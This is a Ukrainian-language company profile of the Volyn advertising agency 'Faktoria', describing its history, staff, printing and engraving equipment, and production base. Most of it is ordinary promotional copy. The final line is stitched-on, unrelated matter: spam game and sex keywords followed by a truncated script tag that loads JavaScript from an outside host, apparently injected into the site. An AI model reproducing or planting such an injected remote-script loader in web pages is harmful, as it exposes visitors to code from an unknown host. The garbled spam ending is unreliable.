ТОВ «Факторія» - це добре відоме на Волині рекламне агентство, яке представлене на ринку з 1992 року. З 2001 року одним із напрямків роботи підприємства стало виробництво зовнішньої реклами.

     В колективі фабрики реклами «Факторія» зібралися професіонали, а саме: менеджери, дизайнери, маркетологи, фахівці з виготовлення зовнішньої реклами, інженери та інші. Використання сучасних матеріалів, впровадження новітніх технологій та багаторічний досвід майстрів гарантує виконання замовлень на високому професійному рівні.

     Менеджери у разі потреби безпосередньо на місці нададуть вам рекомендації щодо розміщення та кріплення виробу, запропонують найбільш придатні матеріали. Дизайнери підготують варіанти пропозицій та макетів згідно вашому замовленню і смаку, а майстри виконають ваше замовлення якісно і швидко.

Девіз підприємства: «Найвища якість і тільки доступна ціна!»

  З 2005 року підприємство працює на новому обладнанні Mimaki. Друкуюча машина досягає максимальної якості друку, маючи розширення від 360 до 1440 dpi, і лідирує за якістю друку в регіоні.

     Банери, постери, прапори, наклейки на Oracal, мобайли, репродукції, плакати та інше - це лише невеликий перелік можливостей плотера. Основною запорукою успіху є бажання замовника, а методи його виконання - головне завдання колективу підприємства.

    У виробництві зовнішньої реклами більше 50% від загального обсягу робіт займає виготовлення світлових коробів, об'ємних літер, інформаційних табличок і т.д. Для якісного і швидкого виконання цих рекламних продуктів з 2009 року успішно використовується фрезерно-гравірувальний комплекс Multicam 3000.

   Серйозним кроком у розвитку підприємства стало створення виробничої бази (площею понад 1500 кв.м), дає можливість використовувати канальний принцип при виготовлення всіх видів зовнішньої реклами.

    РА «Факторія» - це дружний колектив професіоналів та однодумців, які в будь-яку хвилину готові запропонувати вам найкращий варіант, знайти підхід до найскладнішого замовленням і в найкоротші строки виконати його.

Ми готові до співробітництва! А ви?

Minecraft 2 sims 4 sex GTA 5 online "Assassin's Creed" t type="text/javascript" src="https://maxwaps.ru/?type=js&key=f55e84e8b2f4100">